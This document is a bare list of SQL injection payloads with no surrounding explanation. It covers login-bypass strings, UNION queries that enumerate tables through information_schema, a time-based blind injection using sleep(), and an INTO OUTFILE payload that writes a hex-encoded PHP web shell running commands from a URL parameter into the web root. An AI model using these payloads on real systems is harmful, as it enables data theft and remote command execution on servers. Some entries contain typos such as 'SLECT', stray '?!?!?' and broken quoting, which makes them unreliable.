'+OR+1=1--

=1' OR '1'='1
 
=1' OR '1'='1'--+

=1'+UNION+SLECT+1,2,3,4,5+FROM+TABLE    ?!?!?

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

value' INTO OUTFILE '/var/www/html/shelll.php' LINES TERMINATED BY 'union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') INTO OUTFILE '/var/www/html/shell1.php' from webapp.queue-- -


1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
1 union select "1 order by 1-- -",2,3 from information_schema.tables where table_schema=database()
